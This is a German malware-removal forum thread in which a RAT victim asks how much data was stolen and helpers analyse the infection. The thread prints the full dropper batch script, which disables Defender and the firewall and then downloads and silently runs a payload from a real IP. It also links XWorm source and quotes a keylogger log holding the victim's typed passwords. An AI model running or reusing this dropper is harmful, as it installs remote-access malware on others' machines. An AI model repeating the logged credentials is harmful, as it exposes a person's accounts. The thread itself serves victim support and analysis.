|
Diskussionsforum: Rat Trojaner brauche Leute mit ErfahrungWindows 7 Hier sind ausschließlich fachspezifische Diskussionen erwünscht. Bitte keine Log-Files, Hilferufe oder ähnliches posten. Themen zum "Trojaner entfernen" oder "Malware Probleme" dürfen hier nur diskutiert werden. Bereinigungen von nicht ausgebildeten Usern sind hier untersagt. Wenn du dir einen Virus doer Trojaner eingefangen hast, eröffne ein Thema in den Bereinigungsforen oben. |
22.11.2024, 14:56 | #1 |
| Rat Trojaner brauche Leute mit Erfahrung File: win12.exe Checksum Trojaner File: 6f32596ebd4cb3ac5feb00f1b3f71ed03eb28db04df44d878c6531240b1f3171 Analyze Provider: virustotal,intezer Hallo Ich habe mir einen Rat Trojaner eingefangen. Danach habe ich einmal virustotal und intezer drauf losgelassen. Ich habe auch schon verdächtige Dateien im temp Ordner gefunden ( genau die, die virustotal als dropped Files aufzeigt) . Irgendwann wo ich es gemerkt habe habe ich alles gekappt aber das temp Verzeichnis spricht schon eine deutliche Sprache. Ich will also nicht wissen, ob ich einen Trojaner habe sondern wieviel schaden er schon angerichtet hat das beste wäre ein honeypot und jemand führt die Befehle aus die ich blöderweise eingegeben habe. Bin kir auch nicht sicher ob ich hier richtig bin , oder ich habe irgendwie die Möglichkeit auf meiner Kiste zu schauen welche Daten runtergeladen worden sind. Bin mir auch nicht sicher ob ich hier richtig bin. Beste Grüße |
22.11.2024, 15:22 | #2 | |
/// TB-Ausbilder | Rat Trojaner brauche Leute mit ErfahrungVielen Dank für deine Anfrage. Wir entfernen hier Malware. Wenn du deinen Rechner säubern möchtest, bist du hier richtig. Zitat:
Es gibt so viele verschiedene Malwarefamilien mit diversen Untergruppen, die alles Mögliche abgreifen, angefangen bei Zugangsdaten/Passwörter jeglicher Art über Miner bis hin zu CryptoStealern. Research Teams von Sicherheitsfirmen wie Malwarebytes, Microsoft oder Kaspersky können mit Sicherheit sagen, welche Art von Daten diese oder jede Malware abzieht (wenn Sie ALLE dafür notwendigen schädlichen Elemente kennen), aber eine Bezifferung des tatsächlichen Schadens auf deinem System wird auch für die kaum möglich sein. Das was du hier im Sinn hast, wird dir nicht gelingen. Fazit Die Malware muss runter vom System, so schnell wie möglich. Alle Zugangsdaten und Passwörter sollten nach der Bereinigung bzw. nach der Neuinstallation zurückgesetzt bzw. geändert werden. Nachtrag Mindestens genau so wichtig ist, dass du weißt, wie die Malware auf dein System gekommen hast, damit so etwas nicht nochmal passiert. Geändert von M-K-D-B (22.11.2024 um 15:33 Uhr) |
27.11.2024, 20:08 | #3 | |
| Rat Trojaner brauche Leute mit ErfahrungZitat:
Ich habe sogar soviel Infos das ich das 1:1 mit einem Honeypot wiederholen koennte, habe auch schon drueber nachgedacht mit einem Linux und eriner VM einen aufzusetzen. Aber ich denke mir wuerde es schon reichen wie der Trojaner agiert also ob er zB. erst verschluesselt oder eher auf Stehlen von Daten spezialisert ist etc. Aber du meintest ja das es sehr viele Unterarten gibt von Trojanern aber eigentlich dachte ich auch wenn dieseelbe Pruefsumme auftaucht das es exakt derselbe ist. Beste gruesse |
27.11.2024, 21:27 | #4 |
/// Winkelfunktion /// TB-Süch-Tiger™ | Rat Trojaner brauche Leute mit Erfahrung Woher genau weißt du denn das, was genau hast du gemacht? Warum beschreibst du das nicht?
__________________ Logfiles bitte immer in CODE-Tags posten |
28.11.2024, 01:37 | #5 |
| Rat Trojaner brauche Leute mit Erfahrung Der Angreifer bekommt via Telegram eine Nachricht über die gelungene Attacke neben ein paar Eckdaten wie Betriebssystem etc.. Es liegt an ihm, wie er das RAT einsetzt. XWorm ist mächtig. Das kann man z.B. hierdurch https://github[.]com/d00mt3l/XWorm-5.6/archive/refs/heads/main.zip in weiten Teilen nachvollziehen. |
28.11.2024, 09:06 | #6 | |
| Rat Trojaner brauche Leute mit ErfahrungZitat:
HTML-Code: Test: Powershell -Command "Invoke-Webrequest 'hxxp://172.245.20.209/win12.cmd' -OutFile troubleshoot.cmd" && troubleshoot.cmd Code:
ATTFilter @echo off set payload_name=win12.exe set zipname=win12.zip set init_file=%temp%\batman.cmd set zipurl=hxxp://172.245.20.209/win12.zip set unzip="%temp%\unzi.vbs" :------------------------------------- >nul 2>&1 "%SYSTEMROOT%\system32\cacls.exe" "%SYSTEMROOT%\system32\config\system" if '%errorlevel%' NEQ '0' ( goto UACPrompt ) else ( goto gotAdmin) :UACPrompt echo Set UAC = CreateObject^("Shell.Application"^) > "%temp%\getadmin.vbs" set params = %*:"=" echo UAC.ShellExecute "cmd.exe", "/c %~s0 %params%", "", "runas", 1 >> "%temp%\getadmin.vbs" "%temp%\getadmin.vbs" del "%temp%\getadmin.vbs" exit /B :gotAdmin pushd "%CD%" CD /D "%~dp0" :-------------------------------------- goto syscalls :syscalls powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath %TEMP% powershell.exe -command "netsh advfirewall set allprofiles state off" >nul 2>&1 @REM get zip and run Powershell -Command "Invoke-Webrequest 'www.google.nl' -OutFile %temp%\tmp.nl" IF %ERRORLEVEL% NEQ 0 ( @REM No powershell "Invoke-Webrequest" del "%temp%\tmp.nl" goto createDrops1 exit /B ) else ( @REM got powershell "Invoke-Webrequest" del "%temp%\tmp.nl" goto createDrops2 exit /B ) :createDrops1 if exist "%init_file%" del "%init_file%" if exist "%temp%\%zipname%" del "%temp%\%zipname%" if exist "%temp%\%payload_name%" del "%temp%\%payload_name%" @REM create unzip vbs script Call :UnZipCreate "%temp%" "%temp%\%zipname%" > %init_file% echo powershell -Command "(New-Object Net.WebClient).DownloadFile('%zipurl%', '%temp%/%zipname%')" @REM unzip file >> %init_file% echo cscript //nologo %unzip% @REM deletes the .vbs script >> %init_file% echo del %unzip% @REM run payload >> %init_file% echo start "" "%TEMP%\%payload_name%" >> %init_file% echo del "%TEMP%\%zipname%" >> %init_file% echo del %init_file% goto Run_hidden exit /B :createDrops2 if exist "%init_file%" del "%init_file%" if exist "%temp%\%zipname%" del "%temp%\%zipname%" if exist "%temp%\%payload_name%" del "%temp%\%payload_name%" > %init_file% echo Powershell -Command "Invoke-Webrequest '%zipurl%' -OutFile %temp%\%zipname%" >> %init_file% echo Powershell -Command "Expand-Archive -Path %temp%\%zipname% -DestinationPath %temp% -FORCE" @REM run payload >> %init_file% echo start "" %TEMP%\%payload_name% @REM delete zip >> %init_file% echo del "%TEMP%\%zipname%" @REM delete the script >> %init_file% echo del %init_file% goto Run_hidden exit /B :UnZipCreate <ExtractTo> <newzipfile> if exist %unzip% del /f /q %unzip% >%unzip% echo Set fso = CreateObject("Scripting.FileSystemObject") >>%unzip% echo If NOT fso.FolderExists(%1) Then >>%unzip% echo fso.CreateFolder(%1) >>%unzip% echo End If >>%unzip% echo set objShell = CreateObject("Shell.Application") >>%unzip% echo set FilesInZip=objShell.NameSpace(%2).items >>%unzip% echo objShell.NameSpace(%1).CopyHere(FilesInZip) >>%unzip% echo Set fso = Nothing >>%unzip% echo Set objShell = Nothing exit /B :Run_hidden set vbs_hide=%temp%\temprunner.vbs > %vbs_hide% echo Set oShell = CreateObject ("Wscript.Shell") >> %vbs_hide% echo Dim strArgs >> %vbs_hide% echo strArgs = "cmd /c %init_file%" >> %vbs_hide% echo oShell.Run strArgs, 0, false cscript /nologo %vbs_hide% del %vbs_hide% >nul 2>&1 exit /B echo Error: unable to run command. Command is not compatible with the current version. (goto) 2>nul & del "%~f0" |
28.11.2024, 19:29 | #7 |
/// TB-Ausbilder | Rat Trojaner brauche Leute mit Erfahrung Skriptbasierte Malware... bisschen cmd, vbs und ps. Ähnliche Payloads habe ich schon öfter gesehen. Ist sogar noch aktiv... Geändert von M-K-D-B (28.11.2024 um 19:38 Uhr) |
28.11.2024, 20:33 | #8 |
| Rat Trojaner brauche Leute mit Erfahrung Guten Abend, das ist nur das Vorgeplänkel. Relevant: win12.exe->bound.exe->code injection, auf meiner Testkiste Edge. Der Keylogger ist aktiviert. Die Log.tmp befindet sich hier %TEMP%, wenn sie noch nicht gelöscht wurde. |
28.11.2024, 20:56 | #9 | ||
/// TB-Ausbilder | Rat Trojaner brauche Leute mit Erfahrung Glaub ich gerne. Zitat:
Das ist ja das, was den TO interessiert. Du sagtest ja: Zitat:
Geändert von M-K-D-B (28.11.2024 um 21:38 Uhr) |
28.11.2024, 21:58 | #10 | |
| Rat Trojaner brauche Leute mit ErfahrungZitat:
Wichtig für den Hilfesuchenden wäre %TEMP%\Log.tmp. Welche Funktionen des RATs der Angreifer im Einzelfall genau benutzt, weiß nur er. Allein schon die Möglichkeit, weitere Malware zu installieren, bietet enormes Potenzial. |
29.11.2024, 00:26 | #11 | |
| Rat Trojaner brauche Leute mit ErfahrungZitat:
Code:
ATTFilter ### (1) Discord | #ticket-0571 | Support Ticket — Tor Browser ### i[SPACE]tried[SPACE]bv[Back][Back]both[SPACE]commands[SPACE]the[SPACE]new[SPACE]on[SPACE]e[Back][Back]e[SPACE]and[SPACE]the[SPACE]one[SPACE]before[Shift]:[SPACE][Shift][ENTER][CTRL][ENTER]oh[SPACE]ok[SPACE],[SPACE][Back][Back][SPACE][ENTER] ### SearchApp ### cmdcmd ### (1) Discord | #ticket-0571 | Support Ticket — Tor Browser ### cmd[SPACE]is[SPACE]reopend[Back]ed[ENTER] ### • Discord | #��-hello | Boltz — Tor Browser ### [Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back]where[SPACE]i[SPACE]can[SPACE]find[SPACE]the[SPACE]memv[Back]er[Back][Back][SPACE]ber[Back][Back][Back][Back]bers[SPACE]list[SPACE][ENTER] ### (1) Discord | #��-help | Boltz — Tor Browser ### i[SPACE]have[SPACE]made[SPACE]an[SPACE] ### • Discord | #��-help | Boltz — Tor Browser ### support[SPACE]ticket[SPACE]0571kil[ENTER]but[SPACE]before[SPACE]i[SPACE]move[SPACE]on[SPACE]i[SPACE]wu[Back]ould[SPACE]like[SPACE]to[SPACE]know[SPACE]a[SPACE]littel[Back][Back]le[SPACE]bit[SPACE]more[SPACE]over[SPACE]thse[SPACE][Back][Back][Back]ese[SPACE]command[SPACE]which[SPACE]i[SPACE]a[Back]should[SPACE]execute[Shift]:[SPACE] ### • Discord | #ticket-0571 | Support Ticket — Tor Browser ### [CTRL] ### • Discord | #��-help | Boltz — Tor Browser ### [SPACE][CTRL][Shift][ENTER]what[SPACE]does[SPACE]these[SPACE]command[SPACE]do[SPACE][Shift]?[SPACE][ENTER] ### • Discord | #ticket-0571 | Support Ticket — Tor Browser ### sorry[SPACE]im[SPACE]little[SPACE]bit[SPACE][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][SPACE]need[SPACE]mite[Back][Back][Back][Back]more[SPACE]infos[SPACE]wa[Back]hatr[Back][SPACE]s[Back]does[SPACE]the[SPACE]cmd[SPACE]scripzt[Back][Back]z[Back]t[SPACE]do[SPACE][Shift]?[SPACE][ENTER] ### • Discord | #��-help | Boltz — Tor Browser ### fuck[SPACE][ENTER] ### SearchApp ### notpenotpe[Back][ENTER] ### *C:\Users\moejoe\Documents\p.txt - Notepad++ ### pasword1[Tab]pasword1[ENTER] ### SearchApp ### firewall[ENTER] ### Windows-Sicherheit ### ### Firefly ### ######ss[Back]112[Back][Back][Back]123456635241 ### Lokaler Datenträger (C:) ### w ### w - Lokaler Datenträger (C:) ### i ### wi - Lokaler Datenträger (C:) ### n ### explorer ### [Shift]* ### win* - Suchergebnisse in "Lokaler Datenträger (C:)" ### .e ### win*. - Suchergebnisse in "Lokaler Datenträger (C:)" ### xe ### SearchApp ### recover ### Windows Defender deaktivieren - so klappt's | heise online – Mozilla Firefox ### recover[SPACE]windows[SPACE]10[SPACE][ENTER] ### SearchApp ### uac ### explorer ### [Back][Back][Back]bak[ENTER] ### Mozilla Firefox ### anakyse[SPACE][Back][Back][Back][Back][Back]lyse[SPACE]exe[SPACE]file[SPACE][ENTER] ### SearchApp ### blue[ENTER]recover<y[Back][Back][Back]ryviren[ENTER]notpe[Back][Back]e[ENTER] ### *C:\Users\moejoe\Documents\p.txt - Notepad++ ### pasword1[Tab]pasword1[ENTER]pasword1[Tab]pasword1[ENTER]pasword1[Tab]pasword1[ENTER] ### Dieser PC ### w ### w - Dieser PC ### i ### wi - Dieser PC ### n ### win - Dieser PC ### [Shift]* ### explorer ### ### SearchApp ### dokum ### Dokumente ### ### *C:\Users\moejoe\Documents\p.txt - Notepad++ ### pasword1[Tab]pasword1[ENTER] ### SearchApp ### blue ### win*.exe - Suchergebnisse in "Dieser PC" ### ### explorer ### ### win*.exe - Suchergebnisse in "Dieser PC" ### ### explorer ### ### win*.exe - Suchergebnisse in "Dieser PC" ### ### SearchApp ### defenderofll[Back][Back][Back][Back][Back]offline[Back][Back][Back][Back][Back][Back][Back][SPACE]scan[SPACE] ### SearchApp ### reset[Back] ### Banking4 ### pasword1[ENTER] ### SearchApp ### bankin[ENTER][Shift]*.usb ### Dieser PC ### [Shift]* ### * - Dieser PC ### . ### explorer ### [Back][Back] ### Dieser PC ### w ### w - Dieser PC ### i ### wi - Dieser PC ### n ### win - Dieser PC ### [Shift]* ### explorer ### . ### win+. - Suchergebnisse in "Dieser PC" ### [Back] ### win+ - Suchergebnisse in "Dieser PC" ### [Back] ### explorer ### [ENTER] ### Dokumente ### [CTRL] ### explorer ### [CTRL] ### Mein Datentresor - Suchergebnisse in "Dokumente" ### [Shift]* ### Mein Datentresor* - Suchergebnisse in "Dokumente" ### .[Shift]* ### win*.exe - Suchergebnisse in "Dieser PC" ### ### Banking4 ### [CTRL] ### Dokumente ### [CTRL][ENTER] ### Wasabi Wallet ### pasword1[ENTER]pasword1[ENTER] ### Dokumente ### wasabi[ENTER]w-walletbackup[ENTER] ### SearchApp ### sp ### Open Wallet ### [Shift] ### Sparrow ### [Shift][Shift][Shift][Shift][Shift][Shift][Shift][Shift][Shift][Shift][Shift][Shift][Shift][Shift][Shift][Shift][Shift] ### Open Wallet ### ### Sparrow ### pasword1[ENTER]pasword1 ### Sparrow - multi_2 ### pasword1[ENTER]#s ### Sparrow - multi_electrum_2 ### password1# ### Sparrow - multi_elctrum ### [ENTER] ### Sparrow - sparrow_ledger_taproot ### #pass1 ### Sparrow - multisig_wallet ### g3#[ENTER]pasword1[ENTER]#s ### Sparrow - sparrow_segwit ### pass1#[ENTER] ### SearchApp ### rechner[ENTER] ### Firefly ### Pass3 ### LockApp ### [ENTER] ### Dokumente ### ### explorer ### ### Dokumente ### ### explorer ### [ENTER] ### Dokumente ### ### explorer ### ### Dokumente ### ### SearchApp ### uac[ENTER]cmd ### Eingabeaufforderung ### cr[Back]ertutil[SPACE][ENTER] ### Auswählen Eingabeaufforderung ### e ### Eingabeaufforderung ### [Back]regedit[ENTER] ### SearchApp ### gpedit,ma[Back]sc[Back][Back][Back][Back]..[Back]sm[Back][Back]msc[ENTER] ### Eingabeaufforderung ### cd[SPACE]desktop[ENTER]certutil[SPACE]-has[Tab][Tab]hfile[SPACE][Tab][Tab][Tab][Tab][Tab][Tab][Tab][Tab][Tab][Tab][Tab][Tab][Tab][Tab][Tab][Tab][Tab][Tab][Tab][Tab][Tab][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Shift]win[Tab][SPACE][Shift]MD[SPACE]5[ENTER][Back][ENTER] ### Auswählen Eingabeaufforderung ### [CTRL] ### Eingabeaufforderung ### [Back][Back][Back][Shift]SHA256[ENTER] ### Slack ### ### neu 12 - Notepad++ ### [CTRL] ### *neu 12 - Notepad++ ### [ENTER] ### Auswählen Eingabeaufforderung ### [CTRL] ### *neu 12 - Notepad++ ### [CTRL]c ### notepad++ ### hecks ### *neu 12 - Notepad++ ### ums[ENTER] ### SearchApp ### blue ### Downloads ### c ### explorer ### [Shift]:p ### Downloads ### rog[Back][Back][Back][Back] ### explorer ### [Back]prmir ### Downloads ### co[Back][Back][Back] ### explorer ### windstartpro ### Downloads ### sta[Back][Back][Back][ENTER][CTRL][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back] ### explorer ### [Back] ### Downloads ### [Back][Back][Back][Back][Back][Back][Back]c ### explorer ### [Shift]:progmicwinhd ### Downloads ### ows[Back][Back][Back][Back][Back] ### explorer ### dowsspr ### Eingabeaufforderung ### cd[SPACE]progrm[Tab][Back][Back][Back]gam[Tab][Tab][Tab][Tab]data[ENTER]cd[SPACE][Shift]/program[Tab][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back]cd[SPACE]..[ENTER]d[Back][Back]cd[SPACE][Shift]/[ENTER]#l[Back][Back][Back]cd[SPACE]progrm[Tab][Back]am[Tab][Tab][Tab][Tab][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back]mirco[Back][Back][Back]cros[Tab]windows[SPACE]ß[Back][Back]str[Tab][Back]a[Tab]progr[Tab]st[Tab][Tab][Back][Tab][Back][Tab][Tab][Tab][Tab][Tab][Tab][Tab][Tab][Tab][Tab][Tab][Tab][Tab][Tab][Tab][Tab][Tab][Tab][Tab][Tab][Tab][Tab][Tab][Tab]au[Tab][Tab][Tab][Back][Back]a[Back]a[Back][Tab][Tab][Tab][ENTER]dir[ENTER] ### SearchApp ### auto[Back][Back][Back][Back][Back]msconfig[ENTER] ### Autostart ### [CTRL] ### win*.exe - Suchergebnisse in "Dieser PC" ### docu ### docu - Suchergebnisse in "Dieser PC" ### [Back] ### doc - Suchergebnisse in "Dieser PC" ### ument ### document - Suchergebnisse in "Dieser PC" ### es ### documentes - Suchergebnisse in "Dieser PC" ### [Back] ### documente - Suchergebnisse in "Dieser PC" ### [Back]s. ### documents. - Suchergebnisse in "Dieser PC" ### t ### documents.t - Suchergebnisse in "Dieser PC" ### xt ### Autostart ### [Shift]%appd[Back]data[Shift]&[Back][Shift]%[ENTER] ### Temp ### r ### r - Temp ### e ### re - Temp ### s ### res - Suchergebnisse in "Temp" ### 58 ### res5 - Suchergebnisse in "Temp" ### c ### res58c - Suchergebnisse in "Temp" ### 0 ### SearchApp ### blue ### documents.txt - Suchergebnisse in "Dieser PC" ### [Back][Back][Back][Back] ### docum.txt - Suchergebnisse in "Dieser PC" ### [Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back] ### .txt - Suchergebnisse in "Dieser PC" ### [Shift]* ### Lokaler Datenträger (C:) ### [Shift][Shift][Shift][Shift][Shift][Shift][Shift][Shift][Shift][Shift][Shift][Shift][Shift][Shift][Shift][Shift][Shift][Shift][Shift][Shift][Shift]%appdata[Shift]%[ENTER] ### Temp ### [Shift]* ### * - Temp ### . ### explorer ### t ### *.t - Suchergebnisse in "Temp" ### xt ### CredentialUIBroker ### pasword1[ENTER] ### SearchApp ### banking[ENTER] ### Banking4 ### pasword1pasword1[Shift]_4pw[Shift]_[Tab]pasword1[Back][Back][Back][Back][Back][Back][Back][Back]pasword1[Shift]pass2[Shift]_ ### UserAccountBroker ### pasword1[Tab]pasword11[Tab]pasword11neu ### Temp ### [CTRL][CTRL] ### LockApp ### [ENTER] |
29.11.2024, 08:42 | #12 | |
/// TB-Ausbilder | Rat Trojaner brauche Leute mit Erfahrung Na dann weißt du ja schon mal in etwa, welche Daten mit Sicherheit abgeflossen sind. Nur welchen Nutzen hat dieses Wissen jetzt ganz konkret für dich? Zitat:
moejoejoe, du kannst also nicht ausschließen, dann noch weitere Daten abgegriffen wurden. Damit ist eine Neuinstallation sowie das Ändern aller Passwörter meiner Meinung nach alternativlos. Ich werde zwar nie verstehen, warum manche Menschen, sei es nun durch das Ausführen fragwürdiger Dateien oder Befehle oder durch der Verwendung illgaler Software, so fahrlässig mit ihren Daten umgehen. Aber damit habe ich mich abgefunden. Dann hoffe ich für dich, moejoejoe, dass du was daraus gelernt hast und nicht wie so viele andere Nutzer beratungsresistent bist. Alles Gute. |
29.11.2024, 19:01 | #13 | |
| Rat Trojaner brauche Leute mit Erfahrung Ich hatte was vergessen ich habe ab dem Zeitpunkt meine Verbindung gekappt aber der keylogger ist noch mitgelaufen war genau 10 Min. dem RAT Angriff ausgesetzt. Insofern ist per Keylogger nichts weiter Rausgegangen. Code:
ATTFilter ### SearchApp ### notpenotpe[Back][ENTER] Zitat:
Falls du zu denen Menschen gehoerst denen das noch nie passiert ist dann glueckwunsch du bist dann einer von ganz wenigen. Dass das saudaemmlich von mir war das weiss ich selbst. Ich danke fuer deine Hilfe und den Support. B2T: Gibt es eine Moeglichkeit im nachhinein irgendeinem Trace zu folgen das evtl das OS selbst setzt sodass man doch nachvollziehen kann was downgeloadet wurde. Beste gruesse Geändert von moejoejoe (29.11.2024 um 19:33 Uhr) |
29.11.2024, 20:08 | #14 | ||||
| Rat Trojaner brauche Leute mit ErfahrungZitat:
Zitat:
Und hier das Gleiche für Windows 11: Zitat:
Und wenn er die Windows Neuinstallation hat und alles fertig ist, ein Backup/Image Programm installieren und damit eine Sicherung vom Windows auf eine externe USB Festplatte machen.
__________________ Windows 10 64 Pro 22H2 |
30.11.2024, 13:39 | #15 | |
| Rat Trojaner brauche Leute mit Erfahrung Jungs ich will hier keinen Streit ich hätte auch am liebsten meinen persönlichen. Wieder gelöscht das könnte. Ich aber im Nachhinein nicht mehr, da es hier nix zu suchen hat. Insofern war es nur meine pers. IMHO Zitat:
Ich bin mir bewusst das selbst damit ein Restrisiko besteht, ich muss aber abwägen ( gerne auch aufgrund von mehr Spezialisten knowhow) was mir wichtig ist. @_698: Wenn ich das richtig verstehe, hast du ein kl Testsystem aufgesetzt, waere es theoretisch möglich ein hidden os in den 10 min zu hinterlegen sodass es egal wäre ob ich das komplette Netzwerk deaktiviere ?. Beste Grüsse |
Themen zu Rat Trojaner brauche Leute mit Erfahrung |
befehle, beste, brauche, dateien, daten, erfahrung, file, files, führt, gemerkt, kis, leute, möglichkeit, ordner, rat trojaner honeypot, richtig, temp, troja, trojaner, verdächtige, verzeichnis, virus, virustotal, wieviel, win, wissen |